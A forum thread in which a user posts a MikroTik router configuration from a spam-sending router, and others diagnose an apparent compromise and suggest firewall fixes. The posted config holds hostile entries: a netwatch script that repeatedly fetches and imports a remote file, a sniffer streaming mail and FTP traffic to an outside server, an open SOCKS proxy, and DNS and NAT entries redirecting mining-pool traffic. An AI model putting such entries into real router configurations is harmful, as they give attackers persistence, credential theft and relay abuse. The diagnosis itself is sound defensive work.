Router Sending Spam

CompLS · September 26, 2018, 5:23pm

Checked blacklist sites and it’s sending out spam around the clock through port 25. Checked the traffic for every computer in house, ~15 computers, and nothing malicious is found. Turned off every computer over night and spam was still going out. ISP sent me the configuration of the router since they set it up. Not very familiar with configuring Mikrotik routers so simple straight-forward answers would be greatly appreciated..

# sep/26/2018 10:37:29 by RouterOS 6.43
/interface bridge
add fast-forward=no name=bridge-lan
add fast-forward=no name=bridge-wan
/interface ethernet
set [ find default-name=ether1 ] speed=100Mbps
set [ find default-name=ether2 ] speed=100Mbps
set [ find default-name=ether3 ] speed=100Mbps
set [ find default-name=ether4 ] speed=100Mbps
set [ find default-name=ether5 ] speed=100Mbps
set [ find default-name=ether6 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether7 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether8 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether9 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether10 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
/interface wireless
set [ find default-name=wlan1 ] mode=station-pseudobridge ssid=MikroTik
/interface list
add name=WAN
add name=LAN
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip pool
add name=dhcp_pool0 ranges=10.1.1.10-10.1.1.100
add name=dodo ranges=x.x.x.x 
/ip dhcp-server
add address-pool=dhcp_pool0 disabled=no interface=bridge-lan lease-time=1w \
    name=dhcp1
/ppp profile
add change-tcp-mss=yes local-address=x.x.x.x  name=dodo remote-address=dodo \
    use-encryption=yes
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0
/system logging action
set 0 memory-lines=1
/interface bridge port
add bridge=bridge-wan interface=ether4
add bridge=bridge-wan interface=ether1
add bridge=bridge-lan interface=ether3
add bridge=bridge-lan interface=ether2
/interface l2tp-server server
set enabled=yes
/interface list member
add interface=wlan1 list=WAN
add interface=ether1 list=LAN
add interface=ether2 list=LAN
add interface=ether3 list=LAN
add interface=ether4 list=LAN
add interface=ether5 list=LAN
add interface=ether6 list=LAN
add interface=ether7 list=LAN
add interface=ether8 list=LAN
add interface=ether9 list=LAN
add interface=ether10 list=LAN
add interface=sfp1 list=LAN
/interface pptp-server server
set enabled=yes
/ip address
add address=x.x.x.x  disabled=yes interface=ether1 network=\
    x.x.x.x 
add address=10.1.1.1/24 interface=ether2 network=10.1.1.0
add address=x.x.x.x  interface=ether1 network=x.x.x.x 
/ip dhcp-server network
add address=10.1.1.0/24 dns-server=10.1.1.1 gateway=10.1.1.1
/ip dns
set allow-remote-requests=yes servers=1.1.1.1,1.0.0.1
/ip dns static
add address=x.x.x.x name=eth.zion.net.co
add address=x.x.x.x name=asia1.ethermine.org
add address=x.x.x.x name=asia1.ethpool.org
add address=x.x.x.x name=asia1.fullhashed.com
add address=x.x.x.x name=asia2.ethermine.org
add address=x.x.x.x name=cn.sparkpool.com
add address=x.x.x.x name=aurorapool.net
add address=x.x.x.x name=daggerhashimoto.br.nicehash.com
add address=x.x.x.x name=daggerhashimoto.eu.nicehash.com
add address=x.x.x.x name=daggerhashimoto.hk.nicehash.com
add address=x.x.x.x name=daggerhashimoto.in.nicehash.com
add address=x.x.x.x name=daggerhashimoto.jp.nicehash.com
add address=x.x.x.x name=daggerhashimoto.usa.nicehash.com
add address=x.x.x.x name=coinotron.com
add address=x.x.x.x name=eth.1stpool.com
add address=x.x.x.x name=eth.anorak.tech
add address=x.x.x.x name=eth.2miners.com
add address=x.x.x.x name=eth.antpool.com
add address=x.x.x.x name=eth-ar.dwarfpool.com
add address=x.x.x.x name=eth.arsmine.net
add address=x.x.x.x name=eth-as.coinmine.pl
add address=x.x.x.x name=eth-asia1.nanopool.org
add address=x.x.x.x name=eth-br.dwarfpool.com
add address=x.x.x.x name=eth.chileminers.cl
add address=x.x.x.x name=eth.coinfoundry.org
add address=x.x.x.x name=eth.coinmine.pl
add address=x.x.x.x name=ethepool.com
add address=x.x.x.x name=ether.bw.com
add address=x.x.x.x name=etherdig.net
add address=x.x.x.x name=ethereum.marshsoftware.ca
add address=x.x.x.x name=ethereumpool.club
add address=x.x.x.x name=ethergrab.us
add address=x.x.x.x name=ethermine.ru
add address=x.x.x.x name=ethertrench.com
add address=x.x.x.x name=eth.ethertrench.com
add address=x.x.x.x name=eth-eu1.nanopool.org
add address=x.x.x.x name=eth-eu.coinmine.pl
add address=x.x.x.x name=eth-eu.dwarfpool.com
add address=x.x.x.x name=eth-eu.mining.sk
add address=x.x.x.x name=eth-eu.pool.sexy
add address=x.x.x.x name=eth.f2pool.com
add address=x.x.x.x name=eth.gigantpool.com
add address=x.x.x.x name=eth.gpumine.org
add address=x.x.x.x name=eth-hk.dwarfpool.com
add address=x.x.x.x name=eth.miningcity.org
add address=x.x.x.x name=eth.mymininghub.com
add address=x.x.x.x name=eth.pool.minergate.com
add address=x.x.x.x name=eth.poolmining.org
add address=x.x.x.x name=eth-pool.ucrypto.net
add address=x.x.x.x name=eth.pool.zet-tech.eu
add address=x.x.x.x name=eth-ru.dwarfpool.com
add address=x.x.x.x name=eth-ru.edgestile.io
add address=x.x.x.x name=eth-ru.mining.sk
add address=x.x.x.x name=eth-sg.dwarfpool.com
add address=x.x.x.x name=eth.soyminero.es
add address=x.x.x.x name=eth.suprnova.cc
add address=x.x.x.x name=eth.uleypool.com
add address=x.x.x.x name=eth-us.coinmine.pl
add address=x.x.x.x name=eth-us.dwarfpool.com
add address=x.x.x.x name=eth-us-east1.nanopool.org
add address=x.x.x.x name=eth-us.maxhash.org
add address=x.x.x.x name=eth-us.pool.sexy
add address=x.x.x.x name=eth-us-west1.nanopool.org
add address=x.x.x.x name=eth.waterhole.io
add address=x.x.x.x name=eth.xeminer.net
add address=x.x.x.x name=eth.zion.net.co
add address=x.x.x.x name=eu1.ethermine.org
add address=x.x.x.x name=eu1.ethpool.org
add address=x.x.x.x name=eu2.ethermine.org
add address=x.x.x.x name=eu.99miners.com
add address=x.x.x.x name=eu.ethmine.club
add address=x.x.x.x name=eu.sparkpool.com
add address=x.x.x.x name=huabei2-pool.ethfans.org
add address=x.x.x.x name=huabei-pool.ethfans.org
add address=x.x.x.x name=miningcity.org
add address=x.x.x.x name=my.ethpool.net
add address=x.x.x.x name=na-west.sparkpool.com
add address=x.x.x.x name=na-east.sparkpool.com
add address=x.x.x.x name=noobpool.com
add address=x.x.x.x name=pool.ethfans.org
add address=x.x.x.x name=pool.virtualmining.pt
add address=x.x.x.x name=s.comining.io
add address=x.x.x.x name=us1.ethermine.org
add address=x.x.x.x name=us1.ethpool.org
add address=x.x.x.x name=us2.ethermine.org
add address=x.x.x.x name=us2.ethpool.org
add address=x.x.x.x name=vaux-all.uk
add address=x.x.x.x name=asia1.ethermine.org
add address=x.x.x.x name=asia1.ethpool.org
add address=x.x.x.x name=asia1.fullhashed.com
add address=x.x.x.x name=asia2.ethermine.org
add address=x.x.x.x name=cn.sparkpool.com
add address=x.x.x.x name=aurorapool.net
add address=x.x.x.x name=daggerhashimoto.br.nicehash.com
add address=x.x.x.x name=daggerhashimoto.eu.nicehash.com
add address=x.x.x.x name=daggerhashimoto.hk.nicehash.com
add address=x.x.x.x name=daggerhashimoto.in.nicehash.com
add address=x.x.x.x name=daggerhashimoto.jp.nicehash.com
add address=x.x.x.x name=daggerhashimoto.usa.nicehash.com
add address=x.x.x.x name=coinotron.com
add address=x.x.x.x name=eth.1stpool.com
add address=x.x.x.x name=eth.anorak.tech
add address=x.x.x.x name=eth.2miners.com
add address=x.x.x.x name=eth.antpool.com
add address=x.x.x.x name=eth-ar.dwarfpool.com
add address=x.x.x.x name=eth.arsmine.net
add address=x.x.x.x name=eth-as.coinmine.pl
add address=x.x.x.x name=eth-asia1.nanopool.org
add address=x.x.x.x name=eth-br.dwarfpool.com
add address=x.x.x.x name=eth.chileminers.cl
add address=x.x.x.x name=eth.coinfoundry.org
add address=x.x.x.x name=eth.coinmine.pl
add address=x.x.x.x name=ethepool.com
add address=x.x.x.x name=ether.bw.com
add address=x.x.x.x name=etherdig.net
add address=x.x.x.x name=ethereum.marshsoftware.ca
add address=x.x.x.x name=ethereumpool.club
add address=x.x.x.x name=ethergrab.us
add address=x.x.x.x name=ethermine.ru
add address=x.x.x.x name=ethertrench.com
add address=x.x.x.x name=eth.ethertrench.com
add address=x.x.x.x name=eth-eu1.nanopool.org
add address=x.x.x.x name=eth-eu.coinmine.pl
add address=x.x.x.x name=eth-eu.dwarfpool.com
add address=x.x.x.x name=eth-eu.mining.sk
add address=x.x.x.x name=eth-eu.pool.sexy
add address=x.x.x.x name=eth.f2pool.com
add address=x.x.x.x name=eth.gigantpool.com
add address=x.x.x.x name=eth.gpumine.org
add address=x.x.x.x name=eth-hk.dwarfpool.com
add address=x.x.x.x name=eth.miningcity.org
add address=x.x.x.x name=eth.mymininghub.com
add address=x.x.x.x name=eth.pool.minergate.com
add address=x.x.x.x name=eth.poolmining.org
add address=x.x.x.x name=eth-pool.ucrypto.net
add address=x.x.x.x name=eth.pool.zet-tech.eu
add address=x.x.x.x name=eth-ru.dwarfpool.com
add address=x.x.x.x name=eth-ru.edgestile.io
add address=x.x.x.x name=eth-ru.mining.sk
add address=x.x.x.x name=eth-sg.dwarfpool.com
add address=x.x.x.x name=eth.soyminero.es
add address=x.x.x.x name=eth.suprnova.cc
add address=x.x.x.x name=eth.uleypool.com
add address=x.x.x.x name=eth-us.coinmine.pl
add address=x.x.x.x name=eth-us.dwarfpool.com
add address=x.x.x.x name=eth-us-east1.nanopool.org
add address=x.x.x.x name=eth-us.maxhash.org
add address=x.x.x.x name=eth-us.pool.sexy
add address=x.x.x.x name=eth-us-west1.nanopool.org
add address=x.x.x.x name=eth.waterhole.io
add address=x.x.x.x name=eth.xeminer.net
add address=x.x.x.x name=eth.zion.net.co
add address=x.x.x.x name=eu1.ethermine.org
add address=x.x.x.x name=eu1.ethpool.org
add address=x.x.x.x name=eu2.ethermine.org
add address=x.x.x.x name=eu.99miners.com
add address=x.x.x.x name=eu.ethmine.club
add address=x.x.x.x name=eu.sparkpool.com
add address=x.x.x.x name=huabei2-pool.ethfans.org
add address=x.x.x.x name=huabei-pool.ethfans.org
add address=x.x.x.x name=miningcity.org
add address=x.x.x.x name=my.ethpool.net
add address=x.x.x.x name=na-west.sparkpool.com
add address=x.x.x.x name=na-east.sparkpool.com
add address=x.x.x.x name=noobpool.com
add address=x.x.x.x name=pool.ethfans.org
add address=x.x.x.x name=pool.virtualmining.pt
add address=x.x.x.x name=s.comining.io
add address=x.x.x.x name=us1.ethermine.org
add address=x.x.x.x name=us1.ethpool.org
add address=x.x.x.x name=us2.ethermine.org
add address=x.x.x.x name=us2.ethpool.org
add address=x.x.x.x name=vaux-all.uk
add address=x.x.x.x name=worldsex.com
add address=x.x.x.x name=sex.com
add address=x.x.x.x name=pornhub.com
add address=x.x.x.x name=protathlima.com
add address=x.x.x.x name=cyta.com.cy
add address=x.x.x.x name=ergodotisi.com
add address=x.x.x.x name=kerkida.net
add address=x.x.x.x name=bazaraki.com
add address=x.x.x.x name=sexy.com
add address=x.x.x.x name=kerkida.com
add address=x.x.x.x name=bongacams.com
add address=x.x.x.x name=ladbible.com
add address=x.x.x.x name=txxx.com
add address=x.x.x.x name=bitblender.io
add address=x.x.x.x name=privcoin.io
add address=x.x.x.x name=coinmixer.se
add address=x.x.x.x name=bestmixer.io
add address=x.x.x.x name=gramshelixlight.org
add address=x.x.x.x name=btc-blender.com
add address=x.x.x.x name=blender.io
add address=x.x.x.x name=bitcoinmix.com
add address=x.x.x.x name=bitcoinfog.info
add address=x.x.x.x name=login.blockchain.com
add address=x.x.x.x name=blockchain.com
add address=x.x.x.x name=stratum.antpool.com
add address=x.x.x.x name=asia1.ethermine.org
add address=x.x.x.x name=stratum.slushpool.com
add address=x.x.x.x name=asia1.ethpool.org
add address=x.x.x.x name=cn.stratum.slushpool.com
add address=x.x.x.x name=eu.stratum.slushpool.com
add address=x.x.x.x name=asia1.fullhashed.com
add address=x.x.x.x name=jp-stratum.btcc.com
add address=x.x.x.x name=asia2.ethermine.org
add address=x.x.x.x name=cn.sparkpool.com
add address=x.x.x.x name=mint.bitminter.com
add address=x.x.x.x name=aurorapool.net
add address=x.x.x.x name=us.ss.btc.com
add address=x.x.x.x name=daggerhashimoto.br.nicehash.com
add address=x.x.x.x name=na-west.sparkpool.com
add address=x.x.x.x name=daggerhashimoto.eu.nicehash.com
add address=x.x.x.x name=na-east.sparkpool.com
add address=x.x.x.x name=tw.sparkpool.com
add address=x.x.x.x name=daggerhashimoto.hk.nicehash.com
add address=x.x.x.x name=kr.sparkpool.com
add address=x.x.x.x name=daggerhashimoto.in.nicehash.com
add address=x.x.x.x name=jp.sparkpool.com
add address=x.x.x.x name=daggerhashimoto.jp.nicehash.com
add address=x.x.x.x name=bitcoin.viabtc.com
add address=x.x.x.x name=daggerhashimoto.usa.nicehash.com
add address=x.x.x.x name=stratum-us.f2pool.com
add address=x.x.x.x name=coinotron.com
add address=x.x.x.x name=stratum.f2pool.com
add address=x.x.x.x name=eth.1stpool.com
add address=x.x.x.x name=eth.anorak.tech
add address=x.x.x.x name=stratum.btcguild.com
add address=x.x.x.x name=stratum.btccpool.com
add address=x.x.x.x name=stratum.btc.top
add address=x.x.x.x name=eth.2miners.com
add address=x.x.x.x name=eth.antpool.com
add address=x.x.x.x name=eth-ar.dwarfpool.com
add address=x.x.x.x name=eth.arsmine.net
add address=x.x.x.x name=eth-as.coinmine.pl
add address=x.x.x.x name=eth-asia1.nanopool.org
add address=x.x.x.x name=eth-br.dwarfpool.com
add address=x.x.x.x name=eth.chileminers.cl
add address=x.x.x.x name=eth.coinfoundry.org
add address=x.x.x.x name=eth.coinmine.pl
add address=x.x.x.x name=ethepool.com
add address=x.x.x.x name=ether.bw.com
add address=x.x.x.x name=etherdig.net
add address=x.x.x.x name=ethereum.marshsoftware.ca
add address=x.x.x.x name=ethereumpool.club
add address=x.x.x.x name=ethergrab.us
add address=x.x.x.x name=ethermine.ru
add address=x.x.x.x name=ethertrench.com
add address=x.x.x.x name=eth.ethertrench.com
add address=x.x.x.x name=eth-eu1.nanopool.org
add address=x.x.x.x name=eth-eu.coinmine.pl
add address=x.x.x.x name=eth-eu.dwarfpool.com
add address=x.x.x.x name=eth-eu.mining.sk
add address=x.x.x.x name=eth-eu.pool.sexy
add address=x.x.x.x name=eth.f2pool.com
add address=x.x.x.x name=eth.gigantpool.com
add address=x.x.x.x name=eth.gpumine.org
add address=x.x.x.x name=eth-hk.dwarfpool.com
add address=x.x.x.x name=eth.miningcity.org
add address=x.x.x.x name=eth.mymininghub.com
add address=x.x.x.x name=eth.pool.minergate.com
add address=x.x.x.x name=eth.poolmining.org
add address=x.x.x.x name=eth-pool.ucrypto.net
add address=x.x.x.x name=eth.pool.zet-tech.eu
add address=x.x.x.x name=eth-ru.dwarfpool.com
add address=x.x.x.x name=eth-ru.edgestile.io
add address=x.x.x.x name=eth-ru.mining.sk
add address=x.x.x.x name=eth-sg.dwarfpool.com
add address=x.x.x.x name=eth.soyminero.es
add address=x.x.x.x name=eth.suprnova.cc
add address=x.x.x.x name=eth.uleypool.com
add address=x.x.x.x name=eth-us.coinmine.pl
add address=x.x.x.x name=eth-us.dwarfpool.com
add address=x.x.x.x name=eth-us-east1.nanopool.org
add address=x.x.x.x name=eth-us.maxhash.org
add address=x.x.x.x name=eth-us.pool.sexy
add address=x.x.x.x name=eth-us-west1.nanopool.org
add address=x.x.x.x name=eth.waterhole.io
add address=x.x.x.x name=eth.xeminer.net
add address=x.x.x.x name=eth.zion.net.co
add address=x.x.x.x name=eu1.ethermine.org
add address=x.x.x.x name=eu1.ethpool.org
add address=x.x.x.x name=eu2.ethermine.org
add address=x.x.x.x name=eu.99miners.com
add address=x.x.x.x name=eu.ethmine.club
add address=x.x.x.x name=eu.sparkpool.com
add address=x.x.x.x name=huabei2-pool.ethfans.org
add address=x.x.x.x name=huabei-pool.ethfans.org
add address=x.x.x.x name=miningcity.org
add address=x.x.x.x name=my.ethpool.net
add address=x.x.x.x name=noobpool.com
add address=x.x.x.x name=pool.ethfans.org
add address=x.x.x.x name=pool.virtualmining.pt
add address=x.x.x.x name=s.comining.io
add address=x.x.x.x name=us1.ethermine.org
add address=x.x.x.x name=us1.ethpool.org
add address=x.x.x.x name=us2.ethermine.org
add address=x.x.x.x name=us2.ethpool.org
add address=x.x.x.x name=vaux-all.uk
/ip firewall address-list
add address=10.0.0.0/8 list=Exception_List
add address= x.x.x.x/10 list=Exception_List
add address=172.16.0.0/12 list=Exception_List
add address=192.168.0.0/16 list=Exception_List
add address= x.x.x.x/29 list=Exception_List
add address= x.x.x.x/22 list=Exception_List
add address= x.x.x.x/21 list=Exception_List
add address= x.x.x.x/24 list=Exception_List
/ip firewall filter
add action=accept chain=input comment=\
    "Allow Established or Related Connections" connection-state=\
    established,related
add action=drop chain=input comment="Drop DNS Requests To Router" dst-port=53 \
    protocol=udp src-address-list=!Exception_List
add action=drop chain=input comment="Drop DNS Requests To Router" dst-port=53 \
    protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop FTP" dst-port=21 protocol=tcp
add action=drop chain=input comment="Drop SSH" dst-port=22 protocol=tcp \
    src-address-list=!Exception_List
add action=drop chain=input comment="Drop Telnet" dst-port=23 protocol=tcp
add action=drop chain=input comment="Drop HTTP/HTTPS" dst-port=80,443 protocol=\
    tcp
add action=drop chain=input comment="Drop Socks" dst-port=1080 protocol=tcp
add action=drop chain=input comment="Drop Socks" dst-port=1080 protocol=udp
add action=drop chain=input comment="Drop RouterOS Winbox" dst-port=8291 \
    protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop RouterOS API" dst-port=8728,8729 \
    protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop DDoS Attackers" src-address-list=\
    DDoS-Attacker
add action=drop chain=input comment="Drop Port Scanners" src-address-list=\
    "port scanners"
add action=drop chain=forward comment="Drop DDoS Attackers" connection-state=\
    new dst-address-list=DDoS-Victim src-address-list=DDoS-Attacker
add action=drop chain=forward comment="Drop Port Scanners" src-address-list=\
    "port scanners"
add action=add-src-to-address-list address-list=blocked-addr \
    address-list-timeout=1d chain=input comment="DDoS Protection" \
    connection-limit=100,32 protocol=tcp
add action=tarpit chain=input connection-limit=3,32 protocol=tcp \
    src-address-list=blocked-addr
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="Add Port Scanners To List" \
    protocol=tcp psd=21,3s,3,1
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="NMAP FIN Stealth scan" \
    protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="SYN/FIN scan" protocol=tcp \
    tcp-flags=fin,syn
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="SYN/RST scan" protocol=tcp \
    tcp-flags=syn,rst
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="FIN/PSH/URG scan" protocol=tcp \
    tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="ALL/ALL scan" protocol=tcp \
    tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="NMAP NULL scan" protocol=tcp \
    tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg
add action=jump chain=input comment="DDoS Flood protect" connection-state=new \
    jump-target=DDoS-Protect
add action=return chain=DDoS-Protect src-address-list=InternalDNSServers
add action=return chain=DDoS-Protect dst-limit=32,256,src-and-dst-addresses/10s
add action=add-dst-to-address-list address-list=DDoS-Victim \
    address-list-timeout=10m chain=DDoS-Protect
add action=add-src-to-address-list address-list=DDoS-Attacker \
    address-list-timeout=10m chain=DDoS-Protect
add action=drop chain=forward comment="Block Bogon IP addresses" src-address=\
    0.0.0.0/8
add action=drop chain=forward dst-address=0.0.0.0/8
add action=drop chain=forward src-address=127.0.0.0/8
add action=drop chain=forward dst-address=127.0.0.0/8
add action=drop chain=forward src-address=x.x.x.x/3
add action=drop chain=forward dst-address=x.x.x.x/3
add action=drop chain=output dst-port=25 out-interface=bridge-lan protocol=tcp \
    src-address=10.1.1.0/24
/ip firewall nat
add action=masquerade chain=srcnat out-interface=bridge-wan src-address=\
    10.1.1.0/24 to-addresses=x.x.x.x
add action=masquerade chain=srcnat src-address=x.x.x.x/16
add action=dst-nat chain=dst-nat dst-port=3333 protocol=tcp to-addresses=\
    x.x.x.x 80 to-ports=3333
add action=dst-nat chain=dst-nat dst-port=8888 protocol=tcp to-addresses=\
    x.x.x.x to-ports=3333
add action=dst-nat chain=dst-nat dst-port=14444 protocol=tcp to-addresses=\
    x.x.x.x to-ports=4444
add action=dst-nat chain=dst-nat dst-port=8008 protocol=tcp to-addresses=\
    x.x.x.x to-ports=4444
add action=dst-nat chain=dst-nat dst-port=4444 protocol=tcp to-addresses=\
    x.x.x.x to-ports=4444
/ip firewall service-port
set sip disabled=yes
/ip proxy
set anonymous=yes enabled=yes port=60245
/ip route
add distance=1 gateway=x.x.x.x
add disabled=yes distance=1 gateway=x.x.x.x
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh address="x.x.x.x"
set api disabled=yes
set winbox address="x.x.x.x"
set api-ssl disabled=yes
/ip socks
set connection-idle-timeout=1m enabled=yes max-connections=255 port=64312
/ppp secret
add name=dodo password=dodo profile=dodo
/system clock
set time-zone-name=America/New_York
/system identity
set name="xxxx"
/system routerboard settings
set silent-boot=no
/tool netwatch
add comment=1 host=127.0.0.1 interval=30s up-script="\r\
    \n/tool fetch url=\"http:// x.x.x.x:8000/autosupout.rif\" dst-path=autosu\
    pout.rif\r\
    \n:delay 5\r\
    \n/im autosupout.rif\r\
    \n/file remove [find name=autosupout.rif]\r\
    \n \r\
    \n:delay 3\r\
    \n/tool netw en [find comment=2]\r\
    \n"
add comment=2 down-script="/tool net dis [find comment=1]\r\
    \n:delay 30\r\
    \n/tool net en [find comment=1]" host=192.168.254.123 interval=3m30s \
    timeout=1ms
/tool sniffer
set file-limit=100KiB filter-interface=all filter-ip-protocol=tcp,udp \
    filter-port=ftp-data,ftp,pop3,143,1500,10000 filter-stream=yes \
    streaming-enabled=yes streaming-server=x.x.x.x

##### Disable unused/unnecessary services, lock down others
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh address=x.x.x.x
set api disabled=yes
set api-ssl disabled=yes
set winbox address=x.x.x.x
 
##### Firewall Address List used in rules
/ip firewall address-list
add address=10.0.0.0/8 list=Exception_List
add address=x.x.x.x/10 list=Exception_List
add address=172.16.0.0/12 list=Exception_List
add address=192.168.0.0/16 list=Exception_List
add address=x.x.x.x/29 list=Exception_List
add address=x.x.x.x/22 list=Exception_List
add address=x.x.x.x/21 list=Exception_List
add address= x.x.x.x/24 list=Exception_List
add address= x.x.x.x/24 list=Exception_List
##### Filter rules used for protection
/ip firewall filter
add action=accept chain=input comment="Allow Established or Related Connections" connection-state=established,related
add action=drop chain=input comment="Drop DNS Requests To Router" dst-port=53 protocol=udp src-address-list=!Exception_List
add action=drop chain=input comment="Drop DNS Requests To Router" dst-port=53 protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop FTP" dst-port=21 protocol=tcp
add action=drop chain=input comment="Drop SSH" dst-port=22 protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop Telnet" dst-port=23 protocol=tcp
add action=drop chain=input comment="Drop HTTP/HTTPS" dst-port=80,443 protocol=tcp
add action=drop chain=input comment="Drop Socks" dst-port=1080 protocol=tcp
add action=drop chain=input comment="Drop Socks" dst-port=1080 protocol=udp
add action=drop chain=input comment="Drop RouterOS Winbox" dst-port=8291 protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop RouterOS API" dst-port=8728,8729 protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop DDoS Attackers" src-address-list=DDoS-Attacker
add action=drop chain=input comment="Drop Port Scanners" src-address-list="port scanners"
add action=drop chain=forward comment="Drop DDoS Attackers" connection-state=new dst-address-list=DDoS-Victim src-address-list=DDoS-Attacker
add action=drop chain=forward comment="Drop Port Scanners" src-address-list="port scanners"
add action=add-src-to-address-list address-list=blocked-addr address-list-timeout=1d chain=input comment="DDoS Protection" connection-limit=100,32 protocol=tcp
add action=tarpit chain=input connection-limit=3,32 protocol=tcp src-address-list=blocked-addr
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="Add Port Scanners To List" protocol=tcp psd=21,3s,3,1
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="NMAP FIN Stealth scan" protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="SYN/FIN scan" protocol=tcp tcp-flags=fin,syn
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="SYN/RST scan" protocol=tcp tcp-flags=syn,rst
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="FIN/PSH/URG scan" protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="ALL/ALL scan" protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w chain=input comment="NMAP NULL scan" protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg
add action=jump chain=input comment="DDoS Flood protect" connection-state=new jump-target=DDoS-Protect
add action=return chain=DDoS-Protect src-address-list=InternalDNSServers
add action=return chain=DDoS-Protect dst-limit=32,256,src-and-dst-addresses/10s
add action=add-dst-to-address-list address-list=DDoS-Victim address-list-timeout=10m chain=DDoS-Protect
add action=add-src-to-address-list address-list=DDoS-Attacker address-list-timeout=10m chain=DDoS-Protect
add action=drop chain=forward comment="Block Bogon IP addresses" src-address=0.0.0.0/8
add action=drop chain=forward dst-address=0.0.0.0/8
add action=drop chain=forward src-address=127.0.0.0/8
add action=drop chain=forward dst-address=127.0.0.0/8
add action=drop chain=forward src-address=x.x.x.x
add action=drop chain=forward dst-address=x.x.x.x

Sob · September 26, 2018, 6:16pm

So many rules and so useless in the end…

Your problem is here:

/ip socks
set connection-idle-timeout=1m enabled=yes max-connections=255 port=64312

In other words, most likely scenario is that sometimes in the past your router was hacked using the now well-known WinBox vulnerability. Funnily, if firewall didn’t change since then, it must have been from some address in your Exception_List. SOCKS server was enabled and now it’s used by someone from internet, because your firewall blocks only some selected ports and not this non-standard one.

Edit: And this is probably not intended either:

/ip proxy
set anonymous=yes enabled=yes port=60245

CompLS · September 26, 2018, 6:30pm

Thanks for your quick response! So I should disable the proxy and the socks, then check with my ISP to verify that all addresses listed in the exclusions list are there purposefully is what I’m getting out of that.

Sob · September 26, 2018, 6:59pm

I’d just scrap all chain=input rules and use something simpler. For example, even default firewall is better (don’t forget to define the LAN interface list):

/ip firewall filter
add action=accept chain=input comment="defconf: accept established,related,untracked" connection-state=established,related,untracked
add action=drop chain=input comment="defconf: drop invalid" connection-state=invalid
add action=accept chain=input comment="defconf: accept ICMP" protocol=icmp
add action=drop chain=input comment="defconf: drop all not coming from LAN" in-interface-list=!LAN

It allows all input from LAN and blocks everything else.

If for some reason ISP or you need to be able to access your router from outside, put exception before the last drop rule:

add action=accept chain=input dst-port=8291 protocol=tcp src-address-list=Exception_List

But Exception_List with so many addresses as the current one doesn’t seem like the best idea anyway.

On second look, if x.x.x.x in only one address, then WinBox should be available only from there:

/ip service
set winbox address="x.x.x.x"

CompLS · September 26, 2018, 8:10pm

There’s actually 5 addresses listed for WinBox, not including local addresses. The ISP accesses the router remotely yes, so I’ll have them look over those addresses there as well.

Should I do anything about port 25 since the blacklisting sites say the mail is being sent out through there?

Sob · September 26, 2018, 8:59pm

If spammers use your SOCKS server to send mail, outgoing traffic from you will be to port 25 and to random remote mailservers. If you stop SOCKS, it will stop. There’s nothing more to do.

Your IP address will still be on several blacklists for a while. Decent ones will drop it automatically after a varying period of time. Some would keep it forever, but allow you to request removal. And some can list you as spammer even ten years from now.

CompLS · September 26, 2018, 9:11pm

Gotcha, seriously thank you for the input, very much appreciated. I’ll make the necessary changes and report back.

tippenring · September 26, 2018, 9:45pm

In addition to disabling the proxy and socks services, you need to change all passwords (and ideally usernames) for the router as well. Otherwise the attackers will probably log back in and turn on the socks and proxy services again.

add action=add-src-to-address-list address-list=“port scanners”
address-list-timeout=2w chain=input comment=“NMAP FIN Stealth scan”
protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg
add action=add-src-to-address-list address-list=“port scanners”
address-list-timeout=2w chain=input comment=“SYN/FIN scan” protocol=tcp
tcp-flags=fin,syn
add action=add-src-to-address-list address-list=“port scanners”
address-list-timeout=2w chain=input comment=“SYN/RST scan” protocol=tcp
tcp-flags=syn,rst
add action=add-src-to-address-list address-list=“port scanners”
address-list-timeout=2w chain=input comment=“FIN/PSH/URG scan” protocol=tcp
tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list=“port scanners”
address-list-timeout=2w chain=input comment=“ALL/ALL scan” protocol=tcp
tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list=“port scanners”
